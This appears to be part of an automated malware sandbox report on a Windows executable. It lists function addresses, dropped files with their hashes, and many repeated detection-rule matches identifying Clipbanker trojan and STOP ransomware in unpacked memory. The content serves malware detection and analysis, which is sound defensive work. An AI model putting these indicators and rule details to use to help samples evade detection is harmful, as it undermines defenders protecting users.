Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040DD40 4_2_0040DD40
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CD60 4_2_0050CD60
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0040BDC0 4_2_0040BDC0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CDF0 4_2_0050CDF0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00409DFA 4_2_00409DFA
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CE58 4_2_0050CE58
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0042CE51 4_2_0042CE51
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00406EE0 4_2_00406EE0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00409F76 4_2_00409F76
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00420F30 4_2_00420F30
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CF28 4_2_0050CF28
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CFC0 4_2_0050CFC0
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00449FE3 4_2_00449FE3
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CF90 4_2_0050CF90
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll 036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 00428C81 appears 66 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 00420EC2 appears 40 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 004547A0 appears 64 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 00422587 appears 48 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 05E10160 appears 49 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 05E08EC0 appears 57 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 0042F7C0 appears 129 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 05E40160 appears 49 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 05E38EC0 appears 57 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 0044F23E appears 108 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 00428520 appears 125 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 00450870 appears 52 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 00454E50 appears 62 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 00441A25 appears 44 times
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: String function: 0044F26C appears 41 times
Source: SUwX12D2S6.exe, 00000000.00000000.1671315528.00000000040A0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFires( vs SUwX12D2S6.exe
Source: SUwX12D2S6.exe, 00000001.00000000.1674251853.00000000040A0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFires( vs SUwX12D2S6.exe
Source: SUwX12D2S6.exe, 00000001.00000002.1695921959.00000000030B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFires( vs SUwX12D2S6.exe
Source: SUwX12D2S6.exe, 00000003.00000000.1693857852.00000000040A0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFires( vs SUwX12D2S6.exe
Source: SUwX12D2S6.exe, 00000004.00000000.1698233278.00000000040A0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFires( vs SUwX12D2S6.exe
Source: SUwX12D2S6.exe, 00000005.00000000.1711540344.00000000040A0000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenameFires( vs SUwX12D2S6.exe
Source: SUwX12D2S6.exe, 00000006.00000000.1716117013.00000000040A0000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenameFires( vs SUwX12D2S6.exe
Source: SUwX12D2S6.exe, 0000000B.00000002.1847770373.00000000040A0000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenameFires( vs SUwX12D2S6.exe
Source: SUwX12D2S6.exe, 0000000C.00000000.1843095551.00000000040A0000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenameFires( vs SUwX12D2S6.exe
Source: SUwX12D2S6.exe, 00000017.00000002.2104663369.00000000040A0000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenameFires( vs SUwX12D2S6.exe
Source: SUwX12D2S6.exe, 00000018.00000000.2101331175.00000000040A0000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenameFires( vs SUwX12D2S6.exe
Source: SUwX12D2S6.exe Binary or memory string: OriginalFilenameFires( vs SUwX12D2S6.exe
Source: SUwX12D2S6.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 19.2.mstsca.exe.8515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.8515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.8515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.8515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 10.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 10.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 10.2.build3.exe.8115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 10.2.build3.exe.8115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 25.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 25.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 24.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 25.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0.2.SUwX12D2S6.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.SUwX12D2S6.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
